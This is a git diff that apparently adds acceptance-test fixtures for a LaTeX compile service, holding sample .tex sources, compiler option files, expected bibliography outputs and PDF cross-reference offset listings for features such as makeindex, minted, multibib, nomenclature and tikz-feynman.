b/services/clsi/test/acceptance/fixtures/examples/latex_compiler/main.tex @@ -0,0 +1,9 @@ +\documentclass[a4paper]{article} + +\usepackage{graphicx} + +\begin{document} + +\includegraphics[width=\textwidth]{image.eps} + +\end{document} diff --git a/services/clsi/test/acceptance/fixtures/examples/latex_compiler/options.json b/services/clsi/test/acceptance/fixtures/examples/latex_compiler/options.json new file mode 100644 index 0000000..a280541 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/latex_compiler/options.json @@ -0,0 +1,3 @@ +{ + "compiler": "latex" +} diff --git a/services/clsi/test/acceptance/fixtures/examples/latex_compiler/output.dvi b/services/clsi/test/acceptance/fixtures/examples/latex_compiler/output.dvi new file mode 100644 index 0000000..84888d7 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/latex_compiler/output.dvi differ diff --git a/services/clsi/test/acceptance/fixtures/examples/latex_compiler/output.pdf b/services/clsi/test/acceptance/fixtures/examples/latex_compiler/output.pdf new file mode 100644 index 0000000..d4b5387 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/latex_compiler/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/latex_compiler/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/latex_compiler/output.pdfxref new file mode 100644 index 0000000..8221852 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/latex_compiler/output.pdfxref @@ -0,0 +1,26 @@ +1/0: uncompressed; offset = 25097 +2/0: uncompressed; offset = 25156 +3/0: uncompressed; offset = 25367 +4/0: uncompressed; offset = 15 +5/0: uncompressed; offset = 854 +6/0: uncompressed; offset = 919 +7/0: uncompressed; offset = 1074 +8/0: uncompressed; offset = 1245 +9/0: uncompressed; offset = 18343 +10/0: uncompressed; offset = 18388 +11/0: uncompressed; offset = 18752 +12/0: uncompressed; offset = 19071 +13/0: uncompressed; offset = 19360 +14/0: uncompressed; offset = 19604 +15/0: uncompressed; offset = 19770 +16/0: uncompressed; offset = 20007 +17/0: uncompressed; offset = 20174 +18/0: uncompressed; offset = 20424 +19/0: uncompressed; offset = 20456 +20/0: uncompressed; offset = 20525 +21/0: uncompressed; offset = 23109 +22/0: uncompressed; offset = 23500 +23/0: uncompressed; offset = 24229 +24/0: uncompressed; offset = 24641 +25/0: uncompressed; offset = 24741 +26/0: uncompressed; offset = 24985 diff --git a/services/clsi/test/acceptance/fixtures/examples/lualatex_compiler/main.tex b/services/clsi/test/acceptance/fixtures/examples/lualatex_compiler/main.tex new file mode 100644 index 0000000..28da61e --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/lualatex_compiler/main.tex @@ -0,0 +1,8 @@ +\documentclass{article} +\usepackage{luacode} + +\begin{document} +\begin{luacode} +tex.print("Hello world") +\end{luacode} +\end{document} \ No newline at end of file diff --git a/services/clsi/test/acceptance/fixtures/examples/lualatex_compiler/options.json b/services/clsi/test/acceptance/fixtures/examples/lualatex_compiler/options.json new file mode 100644 index 0000000..96a0543 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/lualatex_compiler/options.json @@ -0,0 +1,3 @@ +{ + "compiler": "lualatex" +} diff --git a/services/clsi/test/acceptance/fixtures/examples/lualatex_compiler/output.pdf b/services/clsi/test/acceptance/fixtures/examples/lualatex_compiler/output.pdf new file mode 100644 index 0000000..57c6874 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/lualatex_compiler/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/lualatex_compiler/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/lualatex_compiler/output.pdfxref new file mode 100644 index 0000000..6e59a2d --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/lualatex_compiler/output.pdfxref @@ -0,0 +1,18 @@ +1/0: uncompressed; offset = 3568 +2/0: uncompressed; offset = 3777 +3/0: uncompressed; offset = 15 +4/0: uncompressed; offset = 216 +5/0: uncompressed; offset = 643 +6/0: uncompressed; offset = 693 +7/0: uncompressed; offset = 819 +8/0: uncompressed; offset = 934 +9/0: uncompressed; offset = 1118 +10/0: uncompressed; offset = 1210 +11/0: uncompressed; offset = 2555 +12/0: uncompressed; offset = 3030 +13/0: compressed; stream = 12, index = 0 +14/0: compressed; stream = 12, index = 1 +15/0: compressed; stream = 12, index = 2 +16/0: compressed; stream = 12, index = 3 +17/0: compressed; stream = 12, index = 4 +18/0: compressed; stream = 12, index = 5 diff --git a/services/clsi/test/acceptance/fixtures/examples/makeindex-custom-style/main.tex b/services/clsi/test/acceptance/fixtures/examples/makeindex-custom-style/main.tex new file mode 100644 index 0000000..fce2826 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/makeindex-custom-style/main.tex @@ -0,0 +1,12 @@ +\documentclass{article} + +\usepackage{makeidx} +\makeindex + +\begin{document} + +To solve various problems in Physics \index{Physics} it can useful to express any arbitrary piecewise-smooth function as a Fourier Series \index{Fourier Series} composed of multiple sine and cosine funcions. + +\printindex + +\end{document} diff --git a/services/clsi/test/acceptance/fixtures/examples/makeindex-custom-style/output.pdf b/services/clsi/test/acceptance/fixtures/examples/makeindex-custom-style/output.pdf new file mode 100644 index 0000000..36fdb35 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/makeindex-custom-style/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/makeindex-custom-style/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/makeindex-custom-style/output.pdfxref new file mode 100644 index 0000000..6557c98 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/makeindex-custom-style/output.pdfxref @@ -0,0 +1,26 @@ +1/0: uncompressed; offset = 16762 +2/0: uncompressed; offset = 16877 +3/0: uncompressed; offset = 17142 +4/0: uncompressed; offset = 24335 +5/0: uncompressed; offset = 32164 +6/0: uncompressed; offset = 32412 +7/0: uncompressed; offset = 15 +8/0: uncompressed; offset = 216 +9/0: uncompressed; offset = 671 +10/0: uncompressed; offset = 721 +11/0: uncompressed; offset = 856 +12/0: uncompressed; offset = 973 +13/0: uncompressed; offset = 1318 +14/0: uncompressed; offset = 2218 +15/0: compressed; stream = 13, index = 0 +16/0: compressed; stream = 13, index = 1 +17/0: compressed; stream = 13, index = 2 +18/0: compressed; stream = 13, index = 3 +19/0: compressed; stream = 13, index = 4 +20/0: compressed; stream = 13, index = 5 +21/0: compressed; stream = 13, index = 6 +22/0: compressed; stream = 13, index = 7 +23/0: compressed; stream = 13, index = 8 +24/0: compressed; stream = 13, index = 9 +25/0: compressed; stream = 13, index = 10 +26/0: compressed; stream = 13, index = 11 diff --git a/services/clsi/test/acceptance/fixtures/examples/makeindex-custom-style/style.ist b/services/clsi/test/acceptance/fixtures/examples/makeindex-custom-style/style.ist new file mode 100644 index 0000000..bdae874 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/makeindex-custom-style/style.ist @@ -0,0 +1,7 @@ +heading_prefix "{\\bfseries\\hfil " +heading_suffix "\\hfil}\\nopagebreak\n" +headings_flag 1 +delim_0 "\\dotfill" +delim_1 "\\dotfill" +delim_2 "\\dotfill" + diff --git a/services/clsi/test/acceptance/fixtures/examples/makeindex/main.tex b/services/clsi/test/acceptance/fixtures/examples/makeindex/main.tex new file mode 100644 index 0000000..fce2826 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/makeindex/main.tex @@ -0,0 +1,12 @@ +\documentclass{article} + +\usepackage{makeidx} +\makeindex + +\begin{document} + +To solve various problems in Physics \index{Physics} it can useful to express any arbitrary piecewise-smooth function as a Fourier Series \index{Fourier Series} composed of multiple sine and cosine funcions. + +\printindex + +\end{document} diff --git a/services/clsi/test/acceptance/fixtures/examples/makeindex/output.pdf b/services/clsi/test/acceptance/fixtures/examples/makeindex/output.pdf new file mode 100644 index 0000000..331c03b Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/makeindex/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/makeindex/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/makeindex/output.pdfxref new file mode 100644 index 0000000..7188737 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/makeindex/output.pdfxref @@ -0,0 +1,22 @@ +1/0: uncompressed; offset = 16778 +2/0: uncompressed; offset = 16893 +3/0: uncompressed; offset = 17109 +4/0: uncompressed; offset = 24938 +5/0: uncompressed; offset = 25186 +6/0: uncompressed; offset = 15 +7/0: uncompressed; offset = 216 +8/0: uncompressed; offset = 650 +9/0: uncompressed; offset = 700 +10/0: uncompressed; offset = 836 +11/0: uncompressed; offset = 953 +12/0: uncompressed; offset = 1298 +13/0: uncompressed; offset = 2103 +14/0: compressed; stream = 12, index = 0 +15/0: compressed; stream = 12, index = 1 +16/0: compressed; stream = 12, index = 2 +17/0: compressed; stream = 12, index = 3 +18/0: compressed; stream = 12, index = 4 +19/0: compressed; stream = 12, index = 5 +20/0: compressed; stream = 12, index = 6 +21/0: compressed; stream = 12, index = 7 +22/0: compressed; stream = 12, index = 8 diff --git a/services/clsi/test/acceptance/fixtures/examples/minted/main.tex b/services/clsi/test/acceptance/fixtures/examples/minted/main.tex new file mode 100644 index 0000000..633abf7 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/minted/main.tex @@ -0,0 +1,10 @@ +\documentclass{article} +\usepackage{minted} +\begin{document} +\begin{minted}{c} +int main() { + printf("hello, world"); + return 0; +} +\end{minted} +\end{document} \ No newline at end of file diff --git a/services/clsi/test/acceptance/fixtures/examples/minted/output.pdf b/services/clsi/test/acceptance/fixtures/examples/minted/output.pdf new file mode 100644 index 0000000..4343a71 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/minted/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/minted/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/minted/output.pdfxref new file mode 100644 index 0000000..6117648 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/minted/output.pdfxref @@ -0,0 +1,19 @@ +1/0: uncompressed; offset = 20679 +2/0: uncompressed; offset = 20927 +3/0: uncompressed; offset = 15 +4/0: uncompressed; offset = 216 +5/0: uncompressed; offset = 650 +6/0: uncompressed; offset = 700 +7/0: uncompressed; offset = 826 +8/0: uncompressed; offset = 934 +9/0: uncompressed; offset = 1252 +10/0: uncompressed; offset = 8248 +11/0: uncompressed; offset = 20115 +12/0: compressed; stream = 11, index = 0 +13/0: compressed; stream = 11, index = 1 +14/0: compressed; stream = 11, index = 2 +15/0: compressed; stream = 11, index = 3 +16/0: compressed; stream = 11, index = 4 +17/0: compressed; stream = 11, index = 5 +18/0: compressed; stream = 11, index = 6 +19/0: compressed; stream = 11, index = 7 diff --git a/services/clsi/test/acceptance/fixtures/examples/multibib_bibliography/bibliography.bib b/services/clsi/test/acceptance/fixtures/examples/multibib_bibliography/bibliography.bib new file mode 100644 index 0000000..29728ba --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/multibib_bibliography/bibliography.bib @@ -0,0 +1,15 @@ +@book{DouglasAdams, + title={The Hitchhiker's Guide to the Galaxy}, + author={Adams, Douglas}, + isbn={9781417642595}, + url={http://books.google.com/books?id=W-xMPgAACAAJ}, + year={1995}, + publisher={San Val} +} + +@book{Tolkien, + title={The Hobbit}, + author={Tolkien, J. R. R.}, + year={1904?} +} + diff --git a/services/clsi/test/acceptance/fixtures/examples/multibib_bibliography/main.tex b/services/clsi/test/acceptance/fixtures/examples/multibib_bibliography/main.tex new file mode 100644 index 0000000..ff93b69 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/multibib_bibliography/main.tex @@ -0,0 +1,23 @@ +\documentclass{report} + +\usepackage{multibib} +\newcites{one}{First references} + +\begin{document} + +\chapter{First chapter} + +The answer to life the universe and everything is 42 \citeone{DouglasAdams} + +\bibliographystyleone{plain} +\bibliographyone{bibliography} + +\chapter{Second chapter} + +All that glitters is not gold \cite{Tolkien} + +\bibliographystyle{plain} +\bibliography{bibliography} + +\end{document} + diff --git a/services/clsi/test/acceptance/fixtures/examples/multibib_bibliography/one.bbl b/services/clsi/test/acceptance/fixtures/examples/multibib_bibliography/one.bbl new file mode 100644 index 0000000..3c63a37 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/multibib_bibliography/one.bbl @@ -0,0 +1,8 @@ +\begin{thebibliography}{1} + +\bibitem{DouglasAdams} +Douglas Adams. +\newblock {\em The Hitchhiker's Guide to the Galaxy}. +\newblock San Val, 1995. + +\end{thebibliography} diff --git a/services/clsi/test/acceptance/fixtures/examples/multibib_bibliography/output.bbl b/services/clsi/test/acceptance/fixtures/examples/multibib_bibliography/output.bbl new file mode 100644 index 0000000..df4ff87 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/multibib_bibliography/output.bbl @@ -0,0 +1,8 @@ +\begin{thebibliography}{1} + +\bibitem{Tolkien} +J.~R.~R. Tolkien. +\newblock {\em The Hobbit}. +\newblock 1904? + +\end{thebibliography} diff --git a/services/clsi/test/acceptance/fixtures/examples/multibib_bibliography/output.pdf b/services/clsi/test/acceptance/fixtures/examples/multibib_bibliography/output.pdf new file mode 100644 index 0000000..7ff55c8 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/multibib_bibliography/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/multibib_bibliography/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/multibib_bibliography/output.pdfxref new file mode 100644 index 0000000..2ceaa2b --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/multibib_bibliography/output.pdfxref @@ -0,0 +1,32 @@ +1/0: uncompressed; offset = 29506 +2/0: uncompressed; offset = 29621 +3/0: uncompressed; offset = 29918 +4/0: uncompressed; offset = 30033 +5/0: uncompressed; offset = 30274 +6/0: uncompressed; offset = 30389 +7/0: uncompressed; offset = 30644 +8/0: uncompressed; offset = 42802 +9/0: uncompressed; offset = 43050 +10/0: uncompressed; offset = 15 +11/0: uncompressed; offset = 216 +12/0: uncompressed; offset = 695 +13/0: uncompressed; offset = 746 +14/0: uncompressed; offset = 900 +15/0: uncompressed; offset = 1017 +16/0: uncompressed; offset = 1286 +17/0: uncompressed; offset = 2443 +18/0: uncompressed; offset = 13147 +19/0: compressed; stream = 16, index = 0 +20/0: compressed; stream = 16, index = 1 +21/0: compressed; stream = 16, index = 2 +22/0: compressed; stream = 16, index = 3 +23/0: compressed; stream = 16, index = 4 +24/0: compressed; stream = 16, index = 5 +25/0: compressed; stream = 16, index = 6 +26/0: compressed; stream = 16, index = 7 +27/0: compressed; stream = 16, index = 8 +28/0: compressed; stream = 16, index = 9 +29/0: compressed; stream = 16, index = 10 +30/0: compressed; stream = 16, index = 11 +31/0: compressed; stream = 16, index = 12 +32/0: compressed; stream = 16, index = 13 diff --git a/services/clsi/test/acceptance/fixtures/examples/nomenclature/main.tex b/services/clsi/test/acceptance/fixtures/examples/nomenclature/main.tex new file mode 100644 index 0000000..3fb928c --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/nomenclature/main.tex @@ -0,0 +1,25 @@ +\documentclass{article} + +\usepackage{nomencl} +\makenomenclature + +\begin{document} + +\section*{Main equations} + +\begin{equation} +a=\frac{N}{A} +\end{equation}% + +\nomenclature{$a$}{The number of angels per unit area}% +\nomenclature{$N$}{The number of angels per needle point}% +\nomenclature{$A$}{The area of the needle point}% + +The equation $\sigma = m a$% +\nomenclature{$\sigma$}{The total mass of angels per unit area}% +\nomenclature{$m$}{The mass of one angel} +follows easily. + +\printnomenclature + +\end{document} diff --git a/services/clsi/test/acceptance/fixtures/examples/nomenclature/output.pdf b/services/clsi/test/acceptance/fixtures/examples/nomenclature/output.pdf new file mode 100644 index 0000000..336ffa8 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/nomenclature/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/nomenclature/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/nomenclature/output.pdfxref new file mode 100644 index 0000000..cc3f61c --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/nomenclature/output.pdfxref @@ -0,0 +1,23 @@ +1/0: uncompressed; offset = 34102 +2/0: uncompressed; offset = 34350 +3/0: uncompressed; offset = 15 +4/0: uncompressed; offset = 216 +5/0: uncompressed; offset = 678 +6/0: uncompressed; offset = 728 +7/0: uncompressed; offset = 856 +8/0: uncompressed; offset = 971 +9/0: uncompressed; offset = 1514 +10/0: uncompressed; offset = 10973 +11/0: uncompressed; offset = 19139 +12/0: uncompressed; offset = 33047 +13/0: compressed; stream = 12, index = 0 +14/0: compressed; stream = 12, index = 1 +15/0: compressed; stream = 12, index = 2 +16/0: compressed; stream = 12, index = 3 +17/0: compressed; stream = 12, index = 4 +18/0: compressed; stream = 12, index = 5 +19/0: compressed; stream = 12, index = 6 +20/0: compressed; stream = 12, index = 7 +21/0: compressed; stream = 12, index = 8 +22/0: compressed; stream = 12, index = 9 +23/0: compressed; stream = 12, index = 10 diff --git a/services/clsi/test/acceptance/fixtures/examples/references_in_include/chapter1.tex b/services/clsi/test/acceptance/fixtures/examples/references_in_include/chapter1.tex new file mode 100644 index 0000000..ded9bb4 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/references_in_include/chapter1.tex @@ -0,0 +1 @@ +\ref{two} \ No newline at end of file diff --git a/services/clsi/test/acceptance/fixtures/examples/references_in_include/chapter2.tex b/services/clsi/test/acceptance/fixtures/examples/references_in_include/chapter2.tex new file mode 100644 index 0000000..993a780 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/references_in_include/chapter2.tex @@ -0,0 +1,2 @@ +\section{Two} +\label{two} \ No newline at end of file diff --git a/services/clsi/test/acceptance/fixtures/examples/references_in_include/main.tex b/services/clsi/test/acceptance/fixtures/examples/references_in_include/main.tex new file mode 100644 index 0000000..0956f98 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/references_in_include/main.tex @@ -0,0 +1,8 @@ +\documentclass{article} + +\begin{document} + +\include{chapter1} +\include{chapter2} + +\end{document} diff --git a/services/clsi/test/acceptance/fixtures/examples/references_in_include/output.pdf b/services/clsi/test/acceptance/fixtures/examples/references_in_include/output.pdf new file mode 100644 index 0000000..e740c94 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/references_in_include/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/references_in_include/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/references_in_include/output.pdfxref new file mode 100644 index 0000000..744030a --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/references_in_include/output.pdfxref @@ -0,0 +1,22 @@ +1/0: uncompressed; offset = 9449 +2/0: uncompressed; offset = 9564 +3/0: uncompressed; offset = 9730 +4/0: uncompressed; offset = 17293 +5/0: uncompressed; offset = 17541 +6/0: uncompressed; offset = 15 +7/0: uncompressed; offset = 216 +8/0: uncompressed; offset = 650 +9/0: uncompressed; offset = 700 +10/0: uncompressed; offset = 835 +11/0: uncompressed; offset = 952 +12/0: uncompressed; offset = 1097 +13/0: uncompressed; offset = 1758 +14/0: compressed; stream = 12, index = 0 +15/0: compressed; stream = 12, index = 1 +16/0: compressed; stream = 12, index = 2 +17/0: compressed; stream = 12, index = 3 +18/0: compressed; stream = 12, index = 4 +19/0: compressed; stream = 12, index = 5 +20/0: compressed; stream = 12, index = 6 +21/0: compressed; stream = 12, index = 7 +22/0: compressed; stream = 12, index = 8 diff --git a/services/clsi/test/acceptance/fixtures/examples/simple_bibliography/bibliography.bib b/services/clsi/test/acceptance/fixtures/examples/simple_bibliography/bibliography.bib new file mode 100644 index 0000000..5e796e0 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/simple_bibliography/bibliography.bib @@ -0,0 +1,9 @@ +@book{DouglasAdams, + title={The Hitchhiker's Guide to the Galaxy}, + author={Adams, Douglas}, + isbn={9781417642595}, + url={http://books.google.com/books?id=W-xMPgAACAAJ}, + year={1995}, + publisher={San Val} +} + diff --git a/services/clsi/test/acceptance/fixtures/examples/simple_bibliography/main.tex b/services/clsi/test/acceptance/fixtures/examples/simple_bibliography/main.tex new file mode 100644 index 0000000..33030bd --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/simple_bibliography/main.tex @@ -0,0 +1,10 @@ +\documentclass{article} + +\begin{document} + +The meaning of life, the universe and everything is 42 \cite{DouglasAdams} + +\bibliographystyle{plain} +\bibliography{bibliography} + +\end{document} diff --git a/services/clsi/test/acceptance/fixtures/examples/simple_bibliography/output.bbl b/services/clsi/test/acceptance/fixtures/examples/simple_bibliography/output.bbl new file mode 100644 index 0000000..3c63a37 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/simple_bibliography/output.bbl @@ -0,0 +1,8 @@ +\begin{thebibliography}{1} + +\bibitem{DouglasAdams} +Douglas Adams. +\newblock {\em The Hitchhiker's Guide to the Galaxy}. +\newblock San Val, 1995. + +\end{thebibliography} diff --git a/services/clsi/test/acceptance/fixtures/examples/simple_bibliography/output.pdf b/services/clsi/test/acceptance/fixtures/examples/simple_bibliography/output.pdf new file mode 100644 index 0000000..517496b Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/simple_bibliography/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/simple_bibliography/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/simple_bibliography/output.pdfxref new file mode 100644 index 0000000..6633bfb --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/simple_bibliography/output.pdfxref @@ -0,0 +1,23 @@ +1/0: uncompressed; offset = 37282 +2/0: uncompressed; offset = 37530 +3/0: uncompressed; offset = 15 +4/0: uncompressed; offset = 216 +5/0: uncompressed; offset = 678 +6/0: uncompressed; offset = 728 +7/0: uncompressed; offset = 856 +8/0: uncompressed; offset = 971 +9/0: uncompressed; offset = 1322 +10/0: uncompressed; offset = 9581 +11/0: uncompressed; offset = 24286 +12/0: uncompressed; offset = 36258 +13/0: compressed; stream = 12, index = 0 +14/0: compressed; stream = 12, index = 1 +15/0: compressed; stream = 12, index = 2 +16/0: compressed; stream = 12, index = 3 +17/0: compressed; stream = 12, index = 4 +18/0: compressed; stream = 12, index = 5 +19/0: compressed; stream = 12, index = 6 +20/0: compressed; stream = 12, index = 7 +21/0: compressed; stream = 12, index = 8 +22/0: compressed; stream = 12, index = 9 +23/0: compressed; stream = 12, index = 10 diff --git a/services/clsi/test/acceptance/fixtures/examples/subdirectories/chapter2.tex b/services/clsi/test/acceptance/fixtures/examples/subdirectories/chapter2.tex new file mode 100644 index 0000000..13a22d2 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/subdirectories/chapter2.tex @@ -0,0 +1 @@ +This is chapter2.tex, included from main.tex. It's not in the same directory but can still be found. diff --git a/services/clsi/test/acceptance/fixtures/examples/subdirectories/output.pdf b/services/clsi/test/acceptance/fixtures/examples/subdirectories/output.pdf new file mode 100644 index 0000000..7ab1341 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/subdirectories/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/subdirectories/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/subdirectories/output.pdfxref new file mode 100644 index 0000000..60f7510 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/subdirectories/output.pdfxref @@ -0,0 +1,26 @@ +1/0: uncompressed; offset = 48194 +2/0: uncompressed; offset = 48442 +3/0: uncompressed; offset = 15 +4/0: uncompressed; offset = 216 +5/0: uncompressed; offset = 699 +6/0: uncompressed; offset = 749 +7/0: uncompressed; offset = 878 +8/0: uncompressed; offset = 1000 +9/0: uncompressed; offset = 8546 +10/0: uncompressed; offset = 9072 +11/0: uncompressed; offset = 10659 +12/0: uncompressed; offset = 18919 +13/0: uncompressed; offset = 35129 +14/0: uncompressed; offset = 47101 +15/0: compressed; stream = 14, index = 0 +16/0: compressed; stream = 14, index = 1 +17/0: compressed; stream = 14, index = 2 +18/0: compressed; stream = 14, index = 3 +19/0: compressed; stream = 14, index = 4 +20/0: compressed; stream = 14, index = 5 +21/0: compressed; stream = 14, index = 6 +22/0: compressed; stream = 14, index = 7 +23/0: compressed; stream = 14, index = 8 +24/0: compressed; stream = 14, index = 9 +25/0: compressed; stream = 14, index = 10 +26/0: compressed; stream = 14, index = 11 diff --git a/services/clsi/test/acceptance/fixtures/examples/subdirectories/subdirectory/bibliography.bib b/services/clsi/test/acceptance/fixtures/examples/subdirectories/subdirectory/bibliography.bib new file mode 100644 index 0000000..5654dbd --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/subdirectories/subdirectory/bibliography.bib @@ -0,0 +1,10 @@ +@book{DouglasAdams, + title={The Hitchhiker's Guide to the Galaxy}, + author={Adams, Douglas}, + isbn={9781417642595}, + url={http://books.google.com/books?id=W-xMPgAACAAJ}, + year={1995}, + publisher={San Val} +} + + diff --git a/services/clsi/test/acceptance/fixtures/examples/subdirectories/subdirectory/chapter1.tex b/services/clsi/test/acceptance/fixtures/examples/subdirectories/subdirectory/chapter1.tex new file mode 100644 index 0000000..3056c07 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/subdirectories/subdirectory/chapter1.tex @@ -0,0 +1 @@ +This is chapter1.tex, included from main.tex diff --git a/services/clsi/test/acceptance/fixtures/examples/subdirectories/subdirectory/image.png b/services/clsi/test/acceptance/fixtures/examples/subdirectories/subdirectory/image.png new file mode 100644 index 0000000..8660218 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/subdirectories/subdirectory/image.png differ diff --git a/services/clsi/test/acceptance/fixtures/examples/subdirectories/subdirectory/main.tex b/services/clsi/test/acceptance/fixtures/examples/subdirectories/subdirectory/main.tex new file mode 100644 index 0000000..9972cde --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/subdirectories/subdirectory/main.tex @@ -0,0 +1,19 @@ +\documentclass{article} + +\usepackage{graphicx} + +\begin{document} + +Hello world, I'm in a subdirectory \cite{DouglasAdams} + +\input{chapter1.tex} +\input{chapter2.tex} + +\begin{centering} +\includegraphics[width=0.5\textwidth]{image.png} +\end{centering} + +\bibliographystyle{plain} +\bibliography{bibliography} + +\end{document} diff --git a/services/clsi/test/acceptance/fixtures/examples/tikz_feynman/main.tex b/services/clsi/test/acceptance/fixtures/examples/tikz_feynman/main.tex new file mode 100644 index 0000000..6071bc2 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/tikz_feynman/main.tex @@ -0,0 +1,66 @@ +\RequirePackage{luatex85} +\documentclass[tikz]{standalone} + +\usepackage[compat=1.1.0]{tikz-feynman} + +\begin{document} +\feynmandiagram [horizontal=a to b] { + i1 -- [fermion] a -- [fermion] i2, + a -- [photon] b, + f1 -- [fermion] b -- [fermion] f2, +}; + +\feynmandiagram [horizontal=a to b] { + i1 [particle=\(e^{-}\)] -- [fermion] a -- [fermion] i2 [particle=\(e^{+}\)], + a -- [photon, edge label=\(\gamma\), momentum'=\(k\)] b, + f1 [particle=\(\mu^{+}\)] -- [fermion] b -- [fermion] f2 [particle=\(\mu^{-}\)], +}; + +\feynmandiagram [large, vertical=e to f] { + a -- [fermion] b -- [photon, momentum=\(k\)] c -- [fermion] d, + b -- [fermion, momentum'=\(p_{1}\)] e -- [fermion, momentum'=\(p_{2}\)] c, + e -- [gluon] f, + h -- [fermion] f -- [fermion] i, +}; + +\begin{tikzpicture} + \begin{feynman} + \vertex (a1) {\(\overline b\)}; + \vertex[right=1cm of a1] (a2); + \vertex[right=1cm of a2] (a3); + \vertex[right=1cm of a3] (a4) {\(b\)}; + \vertex[right=1cm of a4] (a5); + \vertex[right=2cm of a5] (a6) {\(u\)}; + + \vertex[below=2em of a1] (b1) {\(d\)}; + \vertex[right=1cm of b1] (b2); + \vertex[right=1cm of b2] (b3); + \vertex[right=1cm of b3] (b4) {\(\overline d\)}; + \vertex[below=2em of a6] (b5) {\(\overline d\)}; + + \vertex[above=of a6] (c1) {\(\overline u\)}; + \vertex[above=2em of c1] (c3) {\(d\)}; + \vertex at ($(c1)!0.5!(c3) - (1cm, 0)$) (c2); + + \diagram* { + {[edges=fermion] + (b1) -- (b2) -- (a2) -- (a1), + (b5) -- (b4) -- (b3) -- (a3) -- (a4) -- (a5) -- (a6), + }, + (a2) -- [boson, edge label=\(W\)] (a3), + (b2) -- [boson, edge label'=\(W\)] (b3), + + (c1) -- [fermion, out=180, in=-45] (c2) -- [fermion, out=45, in=180] (c3), + (a5) -- [boson, bend left, edge label=\(W^{-}\)] (c2), + }; + + \draw [decoration={brace}, decorate] (b1.south west) -- (a1.north west) + node [pos=0.5, left] {\(B^{0}\)}; + \draw [decoration={brace}, decorate] (c3.north east) -- (c1.south east) + node [pos=0.5, right] {\(\pi^{-}\)}; + \draw [decoration={brace}, decorate] (a6.north east) -- (b5.south east) + node [pos=0.5, right] {\(\pi^{+}\)}; + \end{feynman} +\end{tikzpicture} + +\end{document} diff --git a/services/clsi/test/acceptance/fixtures/examples/tikz_feynman/options.json b/services/clsi/test/acceptance/fixtures/examples/tikz_feynman/options.json new file mode 100644 index 0000000..96a0543 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/tikz_feynman/options.json @@ -0,0 +1,3 @@ +{ + "compiler": "lualatex" +} diff --git a/services/clsi/test/acceptance/fixtures/examples/tikz_feynman/output.pdf b/services/clsi/test/acceptance/fixtures/examples/tikz_feynman/output.pdf new file mode 100644 index 0000000..f14b865 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/tikz_feynman/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/tikz_feynman/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/tikz_feynman/output.pdfxref new file mode 100644 index 0000000..64f5dc2 